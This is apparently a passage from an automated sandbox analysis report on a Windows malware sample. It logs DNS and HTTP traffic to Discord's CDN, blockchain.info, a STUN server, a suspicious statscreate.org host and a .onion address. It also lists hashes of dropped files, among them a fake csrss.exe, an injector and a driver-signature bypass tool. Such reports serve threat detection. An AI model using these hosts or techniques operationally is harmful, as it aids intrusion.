      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard30.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 8752128
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
      Accept-Ranges: bytes
      ETag: "0x8D4B1DACA398C54"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 74614843-001e-003d-31dc-5659b4000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:54:02 GMT
    • flag-us
      DNS
      vsblobprodscussu5shard20.blob.core.windows.net
      patch.exe
      Remote address:
      8.8.8.8:53
      Request
      vsblobprodscussu5shard20.blob.core.windows.net
      IN A
      Response
      vsblobprodscussu5shard20.blob.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.store.core.windows.net
      blob.sat09prdstrz08a.store.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.trafficmanager.net
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.38.228
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.79.68
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.70.36
    • flag-us
      GET
      https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      patch.exe
      Remote address:
      20.150.38.228:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard20.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 503808
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
      Accept-Ranges: bytes
      ETag: "0x8DC23A6A7A80D5E"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ec9fd06e-f01e-007c-54dc-5678f7000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:54:14 GMT
    • flag-us
      GET
      https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      patch.exe
      Remote address:
      20.150.38.228:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard20.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 503808
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
      Accept-Ranges: bytes
      ETag: "0x8DC23A6A7A80D5E"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ec9fd270-f01e-007c-26dc-5678f7000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:54:15 GMT
    • flag-us
      DNS
      crl.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      crl.microsoft.com
      IN A
      Response
      crl.microsoft.com
      IN CNAME
      crl.www.ms.akadns.net
      crl.www.ms.akadns.net
      IN CNAME
      a1363.dscg.akamai.net
      a1363.dscg.akamai.net
      IN A
      2.19.252.157
      a1363.dscg.akamai.net
      IN A
      2.19.252.143
    • flag-gb
      GET
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      Remote address:
      2.19.252.157:80
      Request
      GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: crl.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1036
      Content-Type: application/octet-stream
      Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
      Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
      ETag: 0x8DD1A40E476D877
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4de8ec0b-c01e-0047-3936-4c3cb1000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 25 Dec 2024 14:54:23 GMT
      Connection: keep-alive
    • flag-us
      DNS
      www.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      www.microsoft.com
      IN A
      Response
      www.microsoft.com
      IN CNAME
      www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net
      IN CNAME
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      IN CNAME
      e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net
      IN A
      184.25.193.234
    • flag-gb
      GET
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      Remote address:
      184.25.193.234:80
      Request
      GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: www.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1078
      Content-Type: application/octet-stream
      Content-MD5: PjrtHAukbJio72s77Ag5mA==
      Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
      ETag: 0x8DCFA0366D6C4CA
      x-ms-request-id: ca00f663-501e-0037-2bf2-2b8546000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 25 Dec 2024 14:54:23 GMT
      Connection: keep-alive
      TLS_version: UNKNOWN
      ms-cv: CASMicrosoftCV80aab0ea.0
      ms-cv-esi: CASMicrosoftCV80aab0ea.0
      X-RTag: RT
    • flag-us
      DNS
      cdn.discordapp.com
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.discordapp.com
      IN A
      Response
      cdn.discordapp.com
      IN A
      162.159.129.233
      cdn.discordapp.com
      IN A
      162.159.130.233
      cdn.discordapp.com
      IN A
      162.159.135.233
      cdn.discordapp.com
      IN A
      162.159.133.233
      cdn.discordapp.com
      IN A
      162.159.134.233
    • flag-us
      DNS
      stun4.l.google.com
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      stun4.l.google.com
      IN A
      Response
      stun4.l.google.com
      IN A
      74.125.250.129
    • flag-us
      DNS
      blockchain.info
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      blockchain.info
      IN A
      Response
      blockchain.info
      IN A
      104.16.236.243
      blockchain.info
      IN A
      104.16.237.243
    • flag-us
      DNS
      server16.statscreate.org
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      server16.statscreate.org
      IN A
      Response
    • 204.79.197.219:443 | tls, http | patch.exe | sent 2.9kB, received 10.8kB | packets 18 / 21
      https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
      GET https://msdl.microsoft.com/download/symbols/index2.txt -> 404
      GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb -> 302
      GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb -> 302
      GET https://msdl.microsoft.com/download/symbols/index2.txt -> 404
      GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb -> 302
      GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb -> 302
    • 20.150.70.36:443 | tls, http | patch.exe | sent 349.3kB, received 18.1MB | packets 7306 / 13001
      https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      GET (the URL above) -> 200
      GET (the URL above) -> 200
    • 20.150.38.228:443 | tls, http | patch.exe | sent 27.8kB, received 1.1MB | packets 530 / 756
      https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      GET (the URL above) -> 200
      GET (the URL above) -> 200
    • 2.19.252.157:80 | http | sent 451 B, received 1.7kB | packets 5 / 5
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl -> 200
    • 184.25.193.234:80 | http | sent 393 B, received 1.7kB | packets 4 / 4
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl -> 200
    • 127.0.0.1:31464 | csrss.exe
    • 162.159.129.233:443 | cdn.discordapp.com | tls | csrss.exe | sent 1.2kB, received 5.4kB | packets 13 / 15
    • 127.0.0.1:31464 | csrss.exe
    • 127.0.0.1:31464 | csrss.exe
    • 104.16.236.243:443 | blockchain.info | tls | csrss.exe | sent 1.3kB, received 12.7kB | packets 15 / 19
    • 8.8.8.8:53 | 66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion | dns | csrss.exe | sent 150 B, received 225 B | packets 1 / 1
      DNS request: 66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion
    • 8.8.8.8:53 | msdl.microsoft.com | dns | patch.exe | sent 64 B, received 182 B | packets 1 / 1
      DNS request: msdl.microsoft.com
      DNS response: 204.79.197.219
    • 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | dns | patch.exe | sent 92 B, received 231 B | packets 1 / 1
      DNS request: vsblobprodscussu5shard30.blob.core.windows.net
      DNS response: 20.150.70.36, 20.150.79.68, 20.150.38.228
    • 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | dns | patch.exe | sent 92 B, received 231 B | packets 1 / 1
      DNS request: vsblobprodscussu5shard20.blob.core.windows.net
      DNS response: 20.150.38.228, 20.150.79.68, 20.150.70.36
    • 8.8.8.8:53 | crl.microsoft.com | dns | sent 63 B, received 162 B | packets 1 / 1
      DNS request: crl.microsoft.com
      DNS response: 2.19.252.157, 2.19.252.143
    • 8.8.8.8:53 | www.microsoft.com | dns | sent 63 B, received 230 B | packets 1 / 1
      DNS request: www.microsoft.com
      DNS response: 184.25.193.234
    • 8.8.8.8:53 | cdn.discordapp.com | dns | csrss.exe | sent 64 B, received 144 B | packets 1 / 1
      DNS request: cdn.discordapp.com
      DNS response: 162.159.129.233, 162.159.130.233, 162.159.135.233, 162.159.133.233, 162.159.134.233
    • 8.8.8.8:53 | stun4.l.google.com | dns | csrss.exe | sent 64 B, received 80 B | packets 1 / 1
      DNS request: stun4.l.google.com
      DNS response: 74.125.250.129
    • 74.125.250.129:19302 | stun4.l.google.com | csrss.exe | sent 48 B, received 60 B | packets 1 / 1
    • 8.8.8.8:53 | blockchain.info | dns | csrss.exe | sent 61 B, received 93 B | packets 1 / 1
      DNS request: blockchain.info
      DNS response: 104.16.236.243, 104.16.237.243
    • 8.8.8.8:53 | server16.statscreate.org | dns | csrss.exe | sent 70 B, received 152 B | packets 1 / 1
      DNS request: server16.statscreate.org

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
      Filesize: 8.3MB
      MD5: fd2727132edd0b59fa33733daa11d9ef
      SHA1: 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
      SHA256: 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
      SHA512: 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

    • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
      Filesize: 492KB
      MD5: fafbf2197151d5ce947872a4b0bcbe16
      SHA1: a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
      SHA256: feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
      SHA512: acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      Filesize: 281KB
      MD5: d98e33b66343e7c96158444127a117f6
      SHA1: bb716c5509a2bf345c6c1152f6e3e1452d39d50d
      SHA256: 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
      SHA512: 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

    • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
      Filesize: 5.3MB
      MD5: 1afff8d5352aecef2ecd47ffa02d7f7d
      SHA1: 8b115b84efdb3a1b87f750d35822b2609e665bef
      SHA256: c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
      SHA512: e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

    • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      Filesize: 94KB
      MD5: d98e78fd57db58a11f880b45bb659767
      SHA1: ab70c0d3bd9103c07632eeecee9f51d198ed0e76
      SHA256: 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
      SHA512: aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
      Filesize: 1.7MB
      MD5: 13aaafe14eb60d6a718230e82c671d57
      SHA1: e039dd924d12f264521b8e689426fb7ca95a0a7b
      SHA256: f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
      SHA512: ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

    • \Users\Admin\AppData\Local\Temp\dbghelp.dll
      Filesize: 1.5MB
      MD5: f0616fa8bc54ece07e3107057f74e4db
      SHA1: b33995c4f9a004b7d806c4bb36040ee844781fca
      SHA256: 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
      SHA512: 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

    • \Users\Admin\AppData\Local\Temp\osloader.exe
      Filesize: 591KB
      MD5: e2f68dc7fbd6e0bf031ca3809a739346
      SHA1: 9c35494898e65c8a62887f28e04c0359ab6f63f5
      SHA256: b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
      SHA512: 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

    • \Users\Admin\AppData\Local\Temp\symsrv.dll
      Filesize: 163KB
      MD5: 5c399d34d8dc01741269ff1f1aca7554
      SHA1: e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
      SHA256: e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
      SHA512: 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

    • \Windows\rss\csrss.exe
      Filesize: 4.1MB
      MD5: 4347d1e8d835af022da5509bf3c17266
      SHA1: 4ab23c1a468cee9f4059559df3b4d05474076d2e
      SHA256: d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38
      SHA512: 8ab13c820c36cb62f425a08a3f7af0d8c88a7aea86653a4c630fa031e00e7516e89f0374797c4249ee061e81fce382d904cc6a05c000ad8bb7d5136020d157d9

    • memory/1244-34-0x0000000140000000-0x00000001405E8000-memory.dmp (Filesize 5.9MB)
    • memory/1244-50-0x0000000140000000-0x00000001405E8000-memory.dmp (Filesize 5.9MB)
    • memory/2228-8-0x0000000000400000-0x0000000000C91000-memory.dmp (Filesize 8.6MB)
    • memory/2228-1-0x0000000004B50000-0x0000000004F39000-memory.dmp (Filesize 3.9MB)
    • memory/2228-0-0x0000000004B50000-0x0000000004F39000-memory.dmp (Filesize 3.9MB)
    • memory/2228-4-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2228-2-0x0000000004F40000-0x00000000057B7000-memory.dmp (Filesize 8.5MB)
    • memory/2228-6-0x0000000004B50000-0x0000000004F39000-memory.dmp (Filesize 3.9MB)
    • memory/2228-7-0x0000000004F40000-0x00000000057B7000-memory.dmp (Filesize 8.5MB)
    • memory/2228-3-0x0000000000400000-0x0000000000C91000-memory.dmp (Filesize 8.6MB)
    • memory/2620-71-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-108-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-28-0x0000000004A10000-0x0000000004DF9000-memory.dmp (Filesize 3.9MB)
    • memory/2620-66-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-111-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-110-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-101-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-102-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-103-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-104-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-105-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-106-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-107-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-70-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2620-109-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2672-29-0x0000000000400000-0x0000000003013000-memory.dmp (Filesize 44.1MB)
    • memory/2672-5-0x0000000004B30000-0x0000000004F19000-memory.dmp (Filesize 3.9MB)
